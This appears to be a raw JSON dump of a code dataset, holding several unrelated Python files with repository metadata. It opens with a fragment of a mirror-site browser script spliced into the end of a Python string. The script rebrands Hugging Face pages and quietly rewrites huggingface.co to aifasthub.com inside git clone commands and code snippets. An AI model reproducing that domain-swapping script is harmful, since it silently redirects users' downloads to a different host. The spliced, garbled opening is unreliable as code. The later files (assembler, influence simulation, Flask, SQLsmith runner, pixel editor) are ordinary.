{ // 获取包含Hugging Face文本的span元素 const spans = link.querySelectorAll('span.whitespace-nowrap, span.hidden.whitespace-nowrap'); spans.forEach(span => { if (span.textContent && span.textContent.trim().match(/Hugging\s*Face/i)) { span.textContent = 'AI快站'; } }); }); // 替换logo图片的alt属性 document.querySelectorAll('img[alt*="Hugging"], img[alt*="Face"]').forEach(img => { if (img.alt.match(/Hugging\s*Face/i)) { img.alt = 'AI快站 logo'; } }); } // 替换导航栏中的链接 function replaceNavigationLinks() { // 已替换标记,防止重复运行 if (window._navLinksReplaced) { return; } // 已经替换过的链接集合,防止重复替换 const replacedLinks = new Set(); // 只在导航栏区域查找和替换链接 const headerArea = document.querySelector('header') || document.querySelector('nav'); if (!headerArea) { return; } // 在导航区域内查找链接 const navLinks = headerArea.querySelectorAll('a'); navLinks.forEach(link => { // 如果已经替换过,跳过 if (replacedLinks.has(link)) return; const linkText = link.textContent.trim(); const linkHref = link.getAttribute('href') || ''; // 替换Spaces链接 - 仅替换一次 if ( (linkHref.includes('/spaces') || linkHref === '/spaces' || linkText === 'Spaces' || linkText.match(/^s*Spacess*$/i)) && linkText !== 'OCR模型免费转Markdown' && linkText !== 'OCR模型免费转Markdown' ) { link.textContent = 'OCR模型免费转Markdown'; link.href = 'https://fast360.xyz'; link.setAttribute('target', '_blank'); link.setAttribute('rel', 'noopener noreferrer'); replacedLinks.add(link); } // 删除Posts链接 else if ( (linkHref.includes('/posts') || linkHref === '/posts' || linkText === 'Posts' || linkText.match(/^s*Postss*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } // 替换Docs链接 - 仅替换一次 else if ( (linkHref.includes('/docs') || linkHref === '/docs' || linkText === 'Docs' || linkText.match(/^s*Docss*$/i)) && linkText !== '模型下载攻略' ) { link.textContent = '模型下载攻略'; link.href = '/'; replacedLinks.add(link); } // 删除Enterprise链接 else if ( (linkHref.includes('/enterprise') || linkHref === '/enterprise' || linkText === 'Enterprise' || linkText.match(/^s*Enterprises*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } }); // 查找可能嵌套的Spaces和Posts文本 const textNodes = []; function findTextNodes(element) { if (element.nodeType === Node.TEXT_NODE) { const text = element.textContent.trim(); if (text === 'Spaces' || text === 'Posts' || text === 'Enterprise') { textNodes.push(element); } } else { for (const child of element.childNodes) { findTextNodes(child); } } } // 只在导航区域内查找文本节点 findTextNodes(headerArea); // 替换找到的文本节点 textNodes.forEach(node => { const text = node.textContent.trim(); if (text === 'Spaces') { node.textContent = node.textContent.replace(/Spaces/g, 'OCR模型免费转Markdown'); } else if (text === 'Posts') { // 删除Posts文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } else if (text === 'Enterprise') { // 删除Enterprise文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } }); // 标记已替换完成 window._navLinksReplaced = true; } // 替换代码区域中的域名 function replaceCodeDomains() { // 特别处理span.hljs-string和span.njs-string元素 document.querySelectorAll('span.hljs-string, span.njs-string, span[class*="hljs-string"], span[class*="njs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换hljs-string类的span中的域名(移除多余的转义符号) document.querySelectorAll('span.hljs-string, span[class*="hljs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换pre和code标签中包含git clone命令的域名 document.querySelectorAll('pre, code').forEach(element => { if (element.textContent && element.textContent.includes('git clone')) { const text = element.innerHTML; if (text.includes('huggingface.co')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 处理特定的命令行示例 document.querySelectorAll('pre, code').forEach(element => { const text = element.innerHTML; if (text.includes('huggingface.co')) { // 针对git clone命令的专门处理 if (text.includes('git clone') || text.includes('GIT_LFS_SKIP_SMUDGE=1')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 特别处理模型下载页面上的代码片段 document.querySelectorAll('.flex.border-t, .svelte_hydrator, .inline-block').forEach(container => { const content = container.innerHTML; if (content && content.includes('huggingface.co')) { container.innerHTML = content.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 特别处理模型仓库克隆对话框中的代码片段 try { // 查找包含"Clone this model repository"标题的对话框 const cloneDialog = document.querySelector('.svelte_hydration_boundary, [data-target="MainHeader"]'); if (cloneDialog) { // 查找对话框中所有的代码片段和命令示例 const codeElements = cloneDialog.querySelectorAll('pre, code, span'); codeElements.forEach(element => { if (element.textContent && element.textContent.includes('huggingface.co')) { if (element.innerHTML.includes('huggingface.co')) { element.innerHTML = element.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { element.textContent = element.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); } // 更精确地定位克隆命令中的域名 document.querySelectorAll('[data-target]').forEach(container => { const codeBlocks = container.querySelectorAll('pre, code, span.hljs-string'); codeBlocks.forEach(block => { if (block.textContent && block.textContent.includes('huggingface.co')) { if (block.innerHTML.includes('huggingface.co')) { block.innerHTML = block.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { block.textContent = block.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); }); } catch (e) { // 错误处理但不打印日志 } } // 当DOM加载完成后执行替换 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', () => { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); }); } else { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); } // 增加一个MutationObserver来处理可能的动态元素加载 const observer = new MutationObserver(mutations => { // 检查是否导航区域有变化 const hasNavChanges = mutations.some(mutation => { // 检查是否存在header或nav元素变化 return Array.from(mutation.addedNodes).some(node => { if (node.nodeType === Node.ELEMENT_NODE) { // 检查是否是导航元素或其子元素 if (node.tagName === 'HEADER' || node.tagName === 'NAV' || node.querySelector('header, nav')) { return true; } // 检查是否在导航元素内部 let parent = node.parentElement; while (parent) { if (parent.tagName === 'HEADER' || parent.tagName === 'NAV') { return true; } parent = parent.parentElement; } } return false; }); }); // 只在导航区域有变化时执行替换 if (hasNavChanges) { // 重置替换状态,允许再次替换 window._navLinksReplaced = false; replaceHeaderBranding(); replaceNavigationLinks(); } }); // 开始观察document.body的变化,包括子节点 if (document.body) { observer.observe(document.body, { childList: true, subtree: true }); } else { document.addEventListener('DOMContentLoaded', () => { observer.observe(document.body, { childList: true, subtree: true }); }); } })(); \")\n if \"Geweiht I\" in Wolke.Char.vorteile:\n self.ui.spinKaP.setEnabled(True)\n self.ui.spinKaP.setValue(Wolke.Char.kap.wert)\n elif \"Paktierer I\" in Wolke.Char.vorteile:\n self.ui.spinKaP.setEnabled(True)\n self.ui.spinKaP.setValue(Wolke.Char.kap.wert)\n self.ui.lblKap.setText(\"GuP\")\n self.ui.lblKapZugekauft.setText(\"Gunstpunkte\")\n self.ui.lblKapZugekauft.setToolTip(\"

Ein Paktierer selbst verfügt nicht über übernatürliche Macht, sondern \"\\\n \"erbittet den Beistand seines Erzdämonen: Der Vorteil Paktierer I/II/III/IV verleiht ihm 8/16/24/32 Gunstpunkte (GuP), \"\\\n \"mit denen er den Erzdämon anrufen kann. GuP werden nach Steigerungsfaktor 1 gesteigert. Meist geschieht das, wenn der Paktierer \"\\\n \"ohnehin einen Kreis der Verdammnis aufsteigt oder dem Erzdämonen auf andere Weise nahe ist.

\")\n else:\n self.ui.spinKaP.setValue(0)\n self.ui.spinKaP.setEnabled(False)\n\n self.updateDerivedValues()\n\n self.currentlyLoading = False"},"avg_line_length":{"kind":"number","value":49.8781362007,"string":"49.878136"},"max_line_length":{"kind":"number","value":322,"string":"322"},"alphanum_fraction":{"kind":"number","value":0.6425697039,"string":"0.64257"}}},{"rowIdx":46348,"cells":{"hexsha":{"kind":"string","value":"b9a758d95904be8229412da42c0516b18ac23aa9"},"size":{"kind":"number","value":3957,"string":"3,957"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Assembler/labels.py"},"max_stars_repo_name":{"kind":"string","value":"Laegluin/mikrorechner"},"max_stars_repo_head_hexsha":{"kind":"string","value":"7e5e878072c941e422889465c43dea838b83e5fd"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2019-01-28T01:53:20.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2019-01-28T01:53:20.000Z"},"max_issues_repo_path":{"kind":"string","value":"Assembler/labels.py"},"max_issues_repo_name":{"kind":"string","value":"Laegluin/mikrorechner"},"max_issues_repo_head_hexsha":{"kind":"string","value":"7e5e878072c941e422889465c43dea838b83e5fd"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Assembler/labels.py"},"max_forks_repo_name":{"kind":"string","value":"Laegluin/mikrorechner"},"max_forks_repo_head_hexsha":{"kind":"string","value":"7e5e878072c941e422889465c43dea838b83e5fd"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"import datastrings\nimport re\nimport exceptions as error\n\ndef process_labels(commands):\n try:\n return replace_labels_with_values(commands)\n except (error.label_duplicate_error,error.label_replacement_not_successful_error) as err:\n print(err.string)\n raise error.binary_file_not_creatable_exception('Binary File will not be created. Process has stoppd')\n\ndef replace_labels_with_values(commands):\n label_list = get_label_adress_dictionary(commands)\n label_values = get_label_values_dictionary(commands)\n commands_with_reljumps = commands\n labelname_options = '|'.join(label_list)\n addr = 0\n print('Input after replacing and cutting down Labels, with adresses')\n for line, command in enumerate(commands):\n if re.match('(jump)\\s+(to)\\s+(' + labelname_options + ')\\s*(_\\w+\\s*)?(\\s+#(.)*)?$', command):\n dest = label_list[command.split()[2]] - addr\n if dest - 4 > 0: commands_with_reljumps[line] = 'jump_rel to ' + str(dest)\n else: commands_with_reljumps[line] = 'jump_rel to ' + str(dest)\n elif re.match('(jump_if)\\s+(to)\\s+(' + labelname_options + ')\\s*(_\\w+\\s*)?$', command):\n dest = label_list[command.split()[2]] - addr\n if dest - 4 > 0: commands_with_reljumps[line] = 'jump_rel_if to ' + str(dest)\n else: commands_with_reljumps[line] = 'jump_rel_if to ' + str(dest)\n elif re.match('(R)\\d{1,2}\\s+(=)\\s+(' + labelname_options + ')\\s*$', command):\n words = command.split()\n replacement = replace_register_equals_label(words[0],label_values[words[2]])\n commands_with_reljumps = commands_with_reljumps[:line] + replacement + commands_with_reljumps[line+1:]\n print(str(addr) + ':\\t' + str(commands_with_reljumps[line]))\n try: addr += datastrings.necessary_byte_storage(command)\n except error.data_string_not_convertible_error: raise error.label_replacement_not_successful_error('Label konnten nicht ersetzt werden')\n print('\\n')\n return commands_with_reljumps\n\n#welches register dürfen wir zum zwischenspeichern benutzen?\ndef replace_register_equals_label(register, value):\n if datastrings.is_datastring(value):\n val = int(value,0)\n if val < 0: binary_string = '{0:{fill}{width}b}'.format((-124 + 2 ** 32) % 2 ** 32, fill='0', width=32)\n else: binary_string = '{0:{fill}{width}b}'.format(val, fill='0', width=32)\n replacement = [register + \" = 0b\" + binary_string[0:21],\n \"R3 = 11\",\n register + \" = \" + register + \" << R3 times\",\n \"R3 = 0b\" + binary_string[21:],\n register + \" = \" + register + \" | R3\"]\n return replacement\n return []\n\ndef get_label_adress_dictionary(commands):\n addr = 0\n label_duplicate = 0\n labels = {}\n for line, command in enumerate(commands):\n if(re.match(r'(.)*\\s+(_)[A-Za-z0-9_-]+\\s*$',command)):\n label_name = command.split()[-1][1:]\n for labelName in labels:\n if labelName == label_name: label_duplicate = 1\n if not label_duplicate:\n labels[label_name] = addr\n else:\n raise error.label_duplicate_error('Line ' + str(line+1) + ': Labelname ' + label_name + ' zweimal deklariert!')\n try: addr += datastrings.necessary_byte_storage(command)\n except error.data_string_not_convertible_error:\n print('Line ' + str(line+1) + ': datastring '+ command +'not convertible!')\n return labels\n\ndef get_label_values_dictionary(commands):\n labels_and_values = {}\n for line, command in enumerate(commands):\n if(re.match(r'(.)*\\s+(_)[A-Za-z0-9_-]+\\s*$',command)):\n label_name = command.split()[-1][1:]\n labels_and_values[label_name] = re.sub(r'_[A-Za-z0-9_-]+\\s*$','',command)\n return labels_and_values\n\n# if __name__ == '__main__':\n# start(sys.argv[0])"},"avg_line_length":{"kind":"number","value":50.0886075949,"string":"50.088608"},"max_line_length":{"kind":"number","value":144,"string":"144"},"alphanum_fraction":{"kind":"number","value":0.6285064443,"string":"0.628506"}}},{"rowIdx":46349,"cells":{"hexsha":{"kind":"string","value":"e06a857fedc36a097de58ff641e29f6ee75a71f1"},"size":{"kind":"number","value":3883,"string":"3,883"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"CS303/lab7-9/work/ISE/ISE.py"},"max_stars_repo_name":{"kind":"string","value":"Wycers/Codelib"},"max_stars_repo_head_hexsha":{"kind":"string","value":"86d83787aa577b8f2d66b5410e73102411c45e46"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":22,"string":"22"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-08-07T06:55:10.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-06-12T02:12:19.000Z"},"max_issues_repo_path":{"kind":"string","value":"CS303/lab7-9/work/ISE/ISE.py"},"max_issues_repo_name":{"kind":"string","value":"Wycers/Codelib"},"max_issues_repo_head_hexsha":{"kind":"string","value":"86d83787aa577b8f2d66b5410e73102411c45e46"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":28,"string":"28"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2020-03-04T23:47:22.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-26T18:50:00.000Z"},"max_forks_repo_path":{"kind":"string","value":"CS303/lab7-9/work/ISE/ISE.py"},"max_forks_repo_name":{"kind":"string","value":"Wycers/Codelib"},"max_forks_repo_head_hexsha":{"kind":"string","value":"86d83787aa577b8f2d66b5410e73102411c45e46"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":4,"string":"4"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2019-11-09T15:41:26.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2021-10-10T08:56:57.000Z"},"content":{"kind":"string","value":"from queue import Queue\nimport multiprocessing as mp\nimport time\nimport sys\nimport argparse\nimport os\nimport random\nimport numpy as np\n\nworker_num = 8\nepoch = 2000\n\n\nclass Node:\n def __init__(self, name, threshold=None):\n self.name = name\n self.next = []\n self.weight = []\n\n\nclass Worker(mp.Process):\n def __init__(self):\n super(Worker, self).__init__(target=self.start)\n self.inQ = mp.Queue()\n self.outQ = mp.Queue()\n\n def run(self):\n while True:\n model, nodes, seeds = self.inQ.get()\n if model == 'IC':\n self.outQ.put(IC(nodes, seeds))\n elif model == 'LT':\n self.outQ.put(LT(nodes, seeds))\n\n\ndef IC(nodes, seeds):\n random.seed(int(os.getpid() + time.time() * 1e3 + 114514))\n\n cnt = 0\n queue = []\n acted = [0]* len(nodes)\n\n for i in seeds:\n queue.append(i)\n acted[i.name] = 1\n cnt = cnt + 1\n\n while(len(queue) != 0):\n for i in range(len(queue[0].next)) :\n if acted[queue[0].next[i].name] == 0 :\n ret = random.random()\n if ret <= queue[0].weight[i] :\n cnt = cnt + 1\n acted[queue[0].next[i].name] = 1\n queue.append(queue[0].next[i])\n\n del queue[0]\n return sum([1 for node in nodes if acted[node.name]])\n\n\ndef LT(nodes, seeds):\n random.seed(int(os.getpid() + time.time() * 1e3 + 114514))\n\n queue = [[], []]\n now = 0\n\n acted = [False] * len(nodes)\n threshold = [random.random() for _ in nodes]\n\n for i in seeds:\n queue[now].append(i)\n\n while len(queue[now]) > 0:\n for u in queue[now]:\n acted[u.name] = True\n for i in range(len(u.next)):\n threshold[u.next[i].name] -= u.weight[i]\n\n for u in queue[now]:\n for i in range(len(u.next)):\n if acted[u.next[i].name]:\n continue\n if threshold[u.next[i].name] > 0:\n continue\n queue[now ^ 1].append(u.next[i])\n acted[u.next[i].name] = True\n queue[now] = []\n now ^= 1\n\n return sum([1 for node in nodes if acted[node.name]])\n\n\nif __name__ == '__main__':\n start = time.time()\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--file_name', type=str, default='network.txt')\n parser.add_argument('-s', '--seed', type=str, default='seed1.txt')\n parser.add_argument('-m', '--model', type=str, default='IC')\n parser.add_argument('-t', '--time_limit', type=int, default=120)\n\n args = parser.parse_args()\n time_limit = args.time_limit\n\n nodes = []\n with open(args.file_name) as f:\n line = f.readline()\n tmp = line.split(' ')\n N = int(tmp[0])\n for i in range(N+1):\n nodes.append(Node(int(i)))\n\n for line in f:\n tmp = line.split(' ')\n\n l = int(tmp[0].strip())\n r = int(tmp[1].strip())\n w = float(tmp[2].strip())\n nodes[l].next.append(nodes[r])\n nodes[l].weight.append(w)\n\n seeds = []\n with open(args.seed) as f:\n for line in f:\n tmp = int(line.strip())\n seeds.append(nodes[tmp])\n\n sys.setrecursionlimit(1000000)\n\n if worker_num == 0 or epoch == 0:\n exit(0)\n\n random.seed(int(os.getpid() + time.time() * 1e3 + 114514))\n\n workers = []\n for i in range(worker_num):\n workers.append(Worker())\n workers[i].start()\n\n data = (args.model, nodes, seeds)\n for i in range(epoch):\n workers[i % worker_num].inQ.put(data)\n\n totalsum = 0\n for i in range(epoch):\n totalsum += workers[i % worker_num].outQ.get()\n\n print(totalsum/epoch)\n # print(time.time() - start)\n\n for w in workers:\n w.terminate()\n\n\n sys.stdout.flush()\n\n"},"avg_line_length":{"kind":"number","value":24.7324840764,"string":"24.732484"},"max_line_length":{"kind":"number","value":77,"string":"77"},"alphanum_fraction":{"kind":"number","value":0.5238217873,"string":"0.523822"}}},{"rowIdx":46350,"cells":{"hexsha":{"kind":"string","value":"0ef0f3a4830852c838985588d6408ba9048c6404"},"size":{"kind":"number","value":176,"string":"176"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"app/admin/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"uosorio/heroku_face"},"max_stars_repo_head_hexsha":{"kind":"string","value":"7d6465e71dba17a15d8edaef520adb2fcd09d91e"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"number","value":73,"string":"73"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-12-14T18:12:33.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-02-23T21:39:59.000Z"},"max_issues_repo_path":{"kind":"string","value":"app/admin/__init__.py"},"max_issues_repo_name":{"kind":"string","value":"uosorio/heroku_face"},"max_issues_repo_head_hexsha":{"kind":"string","value":"7d6465e71dba17a15d8edaef520adb2fcd09d91e"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":4,"string":"4"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2019-11-23T18:08:18.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2021-08-23T09:00:15.000Z"},"max_forks_repo_path":{"kind":"string","value":"app/admin/__init__.py"},"max_forks_repo_name":{"kind":"string","value":"uosorio/heroku_face"},"max_forks_repo_head_hexsha":{"kind":"string","value":"7d6465e71dba17a15d8edaef520adb2fcd09d91e"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":33,"string":"33"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2019-06-03T00:30:57.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-10T23:54:43.000Z"},"content":{"kind":"string","value":"\"\"\"\n\nAUTOR: Juanjo\n\nFECHA DE CREACIÓN: 24/05/2019\n\n\"\"\"\n\nfrom flask import Blueprint\n\nadmin_bp = Blueprint('admin', __name__, template_folder='templates')\n\nfrom . import routes\n"},"avg_line_length":{"kind":"number","value":12.5714285714,"string":"12.571429"},"max_line_length":{"kind":"number","value":68,"string":"68"},"alphanum_fraction":{"kind":"number","value":0.7272727273,"string":"0.727273"}}},{"rowIdx":46351,"cells":{"hexsha":{"kind":"string","value":"161c7247d8f7e839d50d1d287907b990848d49ad"},"size":{"kind":"number","value":1288,"string":"1,288"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"scripts/runsqlsmith.py"},"max_stars_repo_name":{"kind":"string","value":"AldoMyrtaj/duckdb"},"max_stars_repo_head_hexsha":{"kind":"string","value":"3aa4978a2ceab8df25e4b20c388bcd7629de73ed"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":2816,"string":"2,816"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-06-26T18:52:52.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-04-06T10:39:15.000Z"},"max_issues_repo_path":{"kind":"string","value":"scripts/runsqlsmith.py"},"max_issues_repo_name":{"kind":"string","value":"AldoMyrtaj/duckdb"},"max_issues_repo_head_hexsha":{"kind":"string","value":"3aa4978a2ceab8df25e4b20c388bcd7629de73ed"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":1310,"string":"1,310"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-04-06T16:04:52.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-03-31T13:52:53.000Z"},"max_forks_repo_path":{"kind":"string","value":"scripts/runsqlsmith.py"},"max_forks_repo_name":{"kind":"string","value":"AldoMyrtaj/duckdb"},"max_forks_repo_head_hexsha":{"kind":"string","value":"3aa4978a2ceab8df25e4b20c388bcd7629de73ed"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":270,"string":"270"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-04-09T06:18:28.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-31T11:55:37.000Z"},"content":{"kind":"string","value":"\n# run SQL smith and collect breaking queries\nimport os\nimport re\nimport subprocess\nimport sys\nimport sqlite3\nfrom python_helpers import open_utf8\n\nsqlsmith_db = 'sqlsmith.db'\nsqlsmith_test_dir = 'test/sqlsmith/queries'\n\nexport_queries = False\n\ncon = sqlite3.connect(sqlsmith_db)\nc = con.cursor()\n\nif len(sys.argv) == 2:\n\tif sys.argv[1] == '--export':\n\t\texport_queries = True\n\telif sys.argv[1] == '--reset':\n\t\tc.execute('DROP TABLE IF EXISTS sqlsmith_errors')\n\telse:\n\t\tprint('Unknown query option ' + sys.argv[1])\n\t\texit(1)\n\nif export_queries:\n\tc.execute('SELECT query FROM sqlsmith_errors')\n\tresults = c.fetchall()\n\tfor fname in os.listdir(sqlsmith_test_dir):\n\t\tos.remove(os.path.join(sqlsmith_test_dir, fname))\n\n\tfor i in range(len(results)):\n\t\twith open(os.path.join(sqlsmith_test_dir, 'sqlsmith-%d.sql' % (i + 1)), 'w+') as f:\n\t\t\tf.write(results[i][0] + \"\\n\")\n\texit(0)\n\ndef run_sqlsmith():\n\tsubprocess.call(['build/debug/third_party/sqlsmith/sqlsmith', '--duckdb=:memory:'])\n\n\nc.execute('CREATE TABLE IF NOT EXISTS sqlsmith_errors(query VARCHAR)')\n\nwhile True:\n\t# run SQL smith\n\trun_sqlsmith()\n\t# get the breaking query\n\twith open_utf8('sqlsmith.log', 'r') as f:\n\t\ttext = re.sub('[ \\t\\n]+', ' ', f.read())\n\n\tc.execute('INSERT INTO sqlsmith_errors VALUES (?)', (text,))\n\tcon.commit()\n\n"},"avg_line_length":{"kind":"number","value":23.8518518519,"string":"23.851852"},"max_line_length":{"kind":"number","value":85,"string":"85"},"alphanum_fraction":{"kind":"number","value":0.701863354,"string":"0.701863"}}},{"rowIdx":46352,"cells":{"hexsha":{"kind":"string","value":"164cb532a76617daac24630c5cbab3d72c4bf693"},"size":{"kind":"number","value":2203,"string":"2,203"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"robolib/robogui/pixel_editor.py"},"max_stars_repo_name":{"kind":"string","value":"Obyoxar/RobolabStatistics"},"max_stars_repo_head_hexsha":{"kind":"string","value":"08343ca3ac49df7efdac33692d7cc4b783e851f5"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":2,"string":"2"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2017-11-30T21:12:11.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2017-12-01T07:52:43.000Z"},"max_issues_repo_path":{"kind":"string","value":"robolib/robogui/pixel_editor.py"},"max_issues_repo_name":{"kind":"string","value":"Obyoxar/RobolabStatistics"},"max_issues_repo_head_hexsha":{"kind":"string","value":"08343ca3ac49df7efdac33692d7cc4b783e851f5"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":14,"string":"14"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2017-11-14T18:12:53.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2018-06-03T16:07:57.000Z"},"max_forks_repo_path":{"kind":"string","value":"robolib/robogui/pixel_editor.py"},"max_forks_repo_name":{"kind":"string","value":"Obyoxar/RobolabStatistics"},"max_forks_repo_head_hexsha":{"kind":"string","value":"08343ca3ac49df7efdac33692d7cc4b783e851f5"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":3,"string":"3"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2018-02-05T10:40:03.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2018-02-09T09:29:19.000Z"},"content":{"kind":"string","value":"import cv2\nimport numpy as np\nfrom robolib.images.feature_extraction import resize_image_to_info\n\n__DEFAULT_CONTINUE_KEYS = [27, 13, 32]\n\n\ndef get_pixel_input_raw(rows, cols, name=\"Edit Image\", dtype=np.float32, low=-1, high=1, continue_keys=None):\n return np.array(_get_pixel_input_raw(rows, cols, name, dtype, low, high, continue_keys)[:, :])\n\n\ndef _get_pixel_input_raw(rows, cols, name=\"Edit Image\", dtype=np.float32, low=-1, high=1, continue_keys=None):\n \"\"\"Get a small image drawn by the user.\"\"\"\n\n if continue_keys is None:\n continue_keys = __DEFAULT_CONTINUE_KEYS\n\n def draw_circle(event, x, y, flags, param):\n if 0 <= x < img.shape[1] and 0 <= y < img.shape[0]:\n if event in [cv2.EVENT_MOUSEMOVE, cv2.EVENT_LBUTTONDOWN] and flags & cv2.EVENT_FLAG_LBUTTON:\n img[y, x] = low if flags & cv2.EVENT_FLAG_SHIFTKEY else high\n\n img = np.empty((rows, cols, 1), dtype)\n img.fill(low)\n\n cv2.namedWindow(name, cv2.WINDOW_KEEPRATIO)\n cv2.setMouseCallback(name, draw_circle)\n\n while True:\n cv2.imshow(name, img)\n if wait_for_end_key(continue_keys):\n break\n cv2.destroyAllWindows()\n\n return img\n\n\ndef get_drawing_input(dst_rows, dst_cols, inp_rows=None, inp_cols=None, name=\"Input Drawing\", dtype=np.float32, low=-1, high=1, continue_keys=None):\n if inp_rows is None:\n inp_rows = dst_rows * 2\n if inp_cols is None:\n inp_cols = dst_cols * 2\n img = _get_pixel_input_raw(inp_rows, inp_cols, name, dtype, low, high, continue_keys)\n\n img = resize_image_to_info(img, dst_rows, dst_cols, low, high)\n return np.array(img[:, :]).reshape((9, 9, 1))\n\n\ndef show_image(mat, name=\"Image\", end_key=27, continue_keys=None):\n if continue_keys is None:\n continue_keys = __DEFAULT_CONTINUE_KEYS\n\n cv2.namedWindow(name, cv2.WINDOW_KEEPRATIO)\n cv2.imshow(name, mat)\n\n ret = False\n\n while True:\n k = wait_for_end_key(continue_keys)\n if k:\n if k == end_key:\n ret = True\n break\n cv2.destroyAllWindows()\n\n return ret\n\n\ndef wait_for_end_key(continue_keys):\n k = cv2.waitKey(20) & 0xFF\n return k if k in continue_keys else 